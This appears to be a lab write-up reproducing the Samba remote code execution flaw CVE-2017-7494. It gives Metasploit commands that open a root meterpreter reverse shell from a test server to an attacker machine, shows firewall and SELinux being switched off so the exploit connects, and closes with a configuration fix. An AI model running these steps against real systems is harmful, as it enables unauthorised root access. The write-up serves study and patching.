Describe

On May 24, 2017, samba released version 4.6.4, which fixed a serious Remote Code Execution Vulnerability, The vulnerability number is cve-2017-7494.

System affected by vulnerability

Samba 3.5.0-4.6.4/4.5.10/4.4.14,The version after 4.6.4/4.5.10/4.4.14 has fixed the vulnerability.

Reappearance

Download the iso.

Install samba server

yum install samba

Modify configuration file

2.png

mkdir /home/samba

start server

service smb restart

1.png

Then open Metasploit in Kali,Configuration the parameters,start exploit

Configuration the parameters

msfconsole
search cve-2017-7494
use exploit/linux/samba/is_known_pipename
set RHOSTS 192.168.1.110
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.111
set TARGET 3
exploit

3.png

exploit

4.png

Samba is executed as root by default, so the vulnerability can get root permission directly.

problems

When it shows :[-] 192.168.1.106:445 - Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.1.106:445) was unreachable.
It could be the iptables or selinux prevented the connect.
clear the iptables’s rules or stop iptables.

iptables -F			#clear the iptables's rules
service stop iptables #stop iptables
setenforce 0 #close selinux

Solution

Modify configuration file

Edit profile
append line: nt pipe support=no

Update the samba server